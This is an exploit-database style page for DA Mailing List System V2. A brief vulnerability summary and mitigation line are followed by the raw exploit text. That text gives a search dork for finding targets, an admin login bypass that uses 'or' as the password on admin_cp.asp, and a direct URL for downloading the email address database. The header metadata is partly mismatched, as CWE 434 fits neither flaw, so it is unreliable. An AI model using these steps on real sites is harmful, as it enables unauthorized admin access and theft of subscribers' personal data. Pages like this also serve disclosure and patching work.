DA Mailing List System V2 Remote Admin Login Exploit & Download files vulnerability

vendor:

DA Mailing List System V2

by:

Phenom

8,8

CVSS

HIGH

Remote Admin Login & Download files vulnerability

264, 434

CWE

Product Name: DA Mailing List System V2

Affected Version From: 2

Affected Version To: 2

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

DA Mailing List System V2 Remote Admin Login Exploit & Download files vulnerability

DA Mailing List System V2 is vulnerable to a Remote Admin Login and Download files vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This will allow the attacker to gain access to the admin panel and download files from the server.

Mitigation:

Upgrade to the latest version of DA Mailing List System V2.

Source

Exploit-DB raw data:

 #######################################################################
 #                                                                     #
 ###      DA Mailing List System V2 Remote Admin Login Exploit       ###
 #                                                                     #
 #######################################################################
 #                                                                     #
 #  Author : Phenom                                                    #
 #                                                                     #
 #  Dork: DA Mailing List System V2 Powered by DigitalArakan.Net       #               
 #                                                                     #
 #  Version : 2                                                        #
 #                                                                     #
 #######################################################################
 #                                                                     #
 # Exploit :                                                           #
 #                                                                     #
 # 1- http://server/path/admin_cp.asp                                  #
 #                                                                     #
 # 2- login with "admin" as user name and 'or' as password             #                          
 #                                                                     #  
 #######################################################################

#######################################################################
#                                                                     #
###      DA Mailing List System V2 Download files vulnerability     ###
#                                                                     #
#######################################################################
#                                                                     #
#  Author : Phenom                                                    #
#                                                                     #
#  Dork: DA Mailing List System V2 Powered by DigitalArakan.Net       #
#                                                                     #
#  Version : 2                                                        #
#                                                                     #
#######################################################################
#                                                                     #
# # Exploit :                                                         #
#                                                                     #
# # http://server/path/db/email_addresses.mdb                         #
#                                                                     #
#######################################################################